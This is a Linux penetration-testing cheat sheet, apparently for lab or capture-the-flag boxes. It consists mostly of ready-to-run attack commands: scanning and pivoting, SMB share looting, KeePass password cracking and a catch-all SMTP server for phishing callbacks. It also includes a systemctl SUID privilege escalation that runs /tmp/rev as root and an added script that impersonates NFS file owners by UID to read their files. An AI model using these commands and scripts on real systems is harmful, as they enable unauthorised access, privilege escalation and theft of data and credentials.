Linux Cheat-Sheet
What’s here?
- Some essential enumeration and pivoting one-liners. :smile:
Enum scripts/bins:
- LinEnum.sh
- pspy, to spot cronjobs and other periodic processes without root
- nmap static binary
- ncat static binary
- pspy64 static binary
- pspy static binary
General
Host discovery (ping sweep only, no port scan):
nmap -sn 10.10.10.0/24
(-sP is the old, deprecated spelling of -sn and still works.)
Port scanning:
Normal scan (default scripts + version detection, all TCP ports):
nmap -sC -sV -p- "target ip" -oN output.txt
(nmap has no plain -o; use -oN for normal output, -oA for all formats.)
Connect scan (needed through proxychains: SOCKS only carries full TCP connections, so SYN scans and ICMP/ARP pings never reach the target; add -Pn):
proxychains nmap -sT -Pn -p- "target ip" -oN output.txt
Note: the full range (-p-) is very slow, and UDP is slower still; do a --top-ports pass first and come back for the rest.
UDP scan:
nmap -sU "target ip" -oN output.txt
Port forwarding:
Local port forwarding (your 5555 -> remote_ip -> remote_address:remote_port):
ssh -L 5555:remote_address:remote_port user@remote_ip
Meterpreter version:
portfwd add -l "localport" -p "remoteport" -r "target host"
Remote port forwarding (remote_ip:5555 -> your box -> local_address:local_port, e.g. to expose a listener to the target):
ssh -R 5555:local_address:local_port user@remote_ip
Dynamic forwarding:
ssh -D "localport" user@remote_ip
Socat version (listen on 8080, relay every connection to target:9001; fork handles more than one client):
socat tcp-listen:8080,reuseaddr,fork tcp:"target ip":9001
Binaries with special Capabilities:
find / -type f -print0 2>/dev/null | xargs -0 getcap 2>/dev/null
alternatively:
/sbin/getcap -r / 2>/dev/null
Quick catch-all SMTP server (prints every received mail to stdout, useful for phishing callbacks and exfil tests):
sudo python -m smtpd -n -c DebuggingServer 0.0.0.0:25
(The smtpd module only exists up to Python 3.11; on newer interpreters use "pip install aiosmtpd" and then "sudo python3 -m aiosmtpd -n -l 0.0.0.0:25".)
SUID binaries (use -perm -2000 for SGID as well):
find / -perm -4000 -type f 2>/dev/null
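The two listings above (getcap and SUID) are usually long, and most entries are stock. Below is an added triage helper, written for this sheet rather than taken from any tool it mentions: it reads the raw output of either command on stdin and keeps only the lines worth reversing. The capability list, the SUID baseline, and the sample tool output are my own assumptions, constructed inline so the script runs offline.

```sh
#!/bin/sh
# Added triage helper for the getcap / SUID listings above (example code, not from
# the original sheet). Both functions read raw tool output on stdin so you can pipe
# the real commands into them on a target; the sample data below is constructed.

# Capabilities that, on a binary you can drive (an interpreter, an editor, anything
# with a writable config), hand over root-equivalent power or arbitrary file access.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_dac_override|cap_dac_read_search|cap_chown|cap_fowner'

# Assumed default SUID basenames on a Debian/Ubuntu-style install. Matching on the
# basename tolerates /bin vs /usr/bin. A baseline hit only means "expected here";
# it says nothing about version-specific bugs in that binary.
SUID_BASELINE='sudo su passwd chsh chfn gpasswd newgrp mount umount fusermount fusermount3 pkexec ssh-keysign dbus-daemon-launch-helper ntfs-3g at Xorg.wrap snap-confine polkit-agent-helper-1'

# flag_caps: keep getcap lines that carry a dangerous capability. Works with both
# output styles: "path = cap_x+ep" (older libcap) and "path cap_x=ep" (libcap >= 2.41).
flag_caps() {
    grep -E "$DANGEROUS_CAPS"
}

# flag_suid: read one path per line (find output) and print the ones whose basename
# is not in the baseline, i.e. the custom/third-party SUID binaries worth a look.
flag_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $SUID_BASELINE " in
            *" $name "*) ;;                 # stock binary, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# triage_live: what you would actually run on a target.
triage_live() {
    echo '[+] binaries with dangerous capabilities:'
    getcap -r / 2>/dev/null | flag_caps
    echo '[+] SUID binaries outside the distro baseline:'
    find / -perm -4000 -type f 2>/dev/null | flag_suid
}

# Constructed sample output, in the formats the two tools print.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/vim.basic cap_dac_read_search=ep'

SAMPLE_SUID='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/local/bin/backup
/usr/bin/systemctl
/bin/su'

if [ "${1:-}" = "live" ]; then
    triage_live
else
    echo '[+] flagged capabilities (sample):'
    printf '%s\n' "$SAMPLE_GETCAP" | flag_caps
    echo '[+] non-baseline SUID binaries (sample):'
    printf '%s\n' "$SAMPLE_SUID" | flag_suid
fi
```

Run it with no arguments to see the sample run (python3.8 with cap_setuid and vim with cap_dac_read_search are flagged, the ping and tcpdump caps are not; backup and systemctl are flagged as non-baseline SUID), or with "live" on a target. Treat the baseline as a starting point: trim or extend it for the distro you are on.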
Sudo check:
sudo -l
Check open files:
fuser "filename"   (which processes hold the file)
lsof               (every open file; lsof -i for network sockets)
NFS shares:
NFS trusts the UID/GID the client presents. Once a share is mounted, create a local user with the same UID as the owner of a remote file and you can read or write that file as them. If the export is configured with no_root_squash, even UID 0 is kept, so files you create as root on the mount are root-owned on the server.
mount -t nfs remoteip:/path /mount/point
(NFS mount sources are host:/path; there is no user@ part.)
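The UID trick above depends on how the export squashes IDs. As an added example (written for this sheet, not taken from any NFS tool), here is a parser for /etc/exports-style lines that reports, per client entry, whether client UIDs are honoured and whether root is squashed, plus a helper that performs the impersonation described above. Everything below is an assumption of mine: the function names, the output format, and the sample exports, which are constructed so the script runs offline.

```sh
#!/bin/sh
# Added helper for the NFS note above (example code, not from the original sheet).
# check_exports parses /etc/exports-style lines; nfs_impersonate_owner does the
# matching-UID trick on a mounted export. The sample exports below are constructed.

# check_exports: read /etc/exports lines on stdin and print one line per client
# entry worth a look, as "<path> <client> <rw|ro> <no_root_squash|root_squash>".
# Entries with all_squash are skipped (every UID maps to nobody, nothing to
# impersonate). A client without "(opts)" gets the NFS defaults: ro, root_squash.
check_exports() {
    set -f   # the client field is often "*"; keep the shell from globbing it
    while read -r path rest; do
        case "$path" in ''|'#'*) continue ;; esac
        for entry in $rest; do
            client=${entry%%"("*}
            opts=${entry#"$client"}
            opts=${opts#"("}
            opts=${opts%")"}
            case ",$opts," in *,all_squash,*) continue ;; esac
            mode=ro
            case ",$opts," in *,rw,*) mode=rw ;; esac
            squash=root_squash
            case ",$opts," in *,no_root_squash,*) squash=no_root_squash ;; esac
            printf '%s %s %s %s\n' "$path" "$client" "$mode" "$squash"
        done
    done
    set +f
}

# nfs_impersonate_owner: mount the export, read the owner UID of a file in it,
# create a local user with that UID (-o allows a duplicate UID) and read the
# file as them. Needs root on the attacking box and GNU stat/useradd.
# Usage: nfs_impersonate_owner server:/export /mnt/nfs relative/path/to/file
nfs_impersonate_owner() {
    export_spec=$1; mnt=$2; target=$3
    mkdir -p "$mnt" && mount -t nfs "$export_spec" "$mnt" || return 1
    uid=$(stat -c %u "$mnt/$target") || return 1
    useradd -o -u "$uid" -M -s /bin/sh "nfsuid$uid" 2>/dev/null   # may already exist
    su "nfsuid$uid" -c "cat '$mnt/$target'"
}

# Constructed /etc/exports as it might be found on the server side.
SAMPLE_EXPORTS='# constructed sample
/srv/backup   10.10.10.0/24(rw,sync,no_root_squash)
/home         *(rw,sync)
/srv/pub      *(ro,all_squash)
/srv/dev      192.168.1.5(rw,no_subtree_check,no_root_squash) 192.168.1.6(ro)
/srv/legacy   10.10.10.7'

if [ "$#" -eq 3 ]; then
    nfs_impersonate_owner "$1" "$2" "$3"
else
    printf '%s\n' "$SAMPLE_EXPORTS" | check_exports
fi
```

Run with no arguments to see the sample verdicts (/srv/pub drops out because of all_squash; /srv/backup and the first /srv/dev client are rw with no_root_squash; /srv/legacy falls back to ro, root_squash), or as "script server:/export /mnt/nfs path/in/export" to do the impersonation. On the attacking side you only have "showmount -e server", which lists exports and allowed clients but not the squash options; those come from /etc/exports once you have a foothold on the server, or from simply trying a root-owned write on the mount.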
SMB things:
List samba shares:
smbclient -L \\\\ip
smbmap -H ip -u user -p password
Connect to a share:
smbclient \\\\ip\\share_name -U "user"%"password"
Download everything (rofl):
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Mount a remote SMB share (drop -o for a guest mount):
mount -t cifs -o username=user,password=pass '//remote_ip/share' /mount/point
Create a simple SMB server (impacket), sharing the current directory:
smbserver.py -smb2support sharename $PWD
KeePass files
If you find a KeePass database (.kdbx), it may be protected by a master password, a key file, or both. To crack the password (pass -k only when a key file is involved):
keepass2john -k MASTER.file file.kdbx > hash.txt
john --wordlist=wordlist hash.txt
Then open it:
kpcli --kdb file.kdbx --key MASTER.file
systemctl as SUID bin:
Create a custom service definition (systemctl link needs an absolute path, and the directory has to exist):
mkdir -p /tmp/.fade
cat > /tmp/.fade/fserv3.service <<'EOF'
[Service]
Type=oneshot
ExecStart=/bin/bash /tmp/rev
[Install]
WantedBy=multi-user.target
EOF
systemctl link /tmp/.fade/fserv3.service
systemctl start fserv3
Starting the unit runs /tmp/rev as root immediately :) ! The [Install] section only matters if you also enable the unit, in which case it runs again at boot.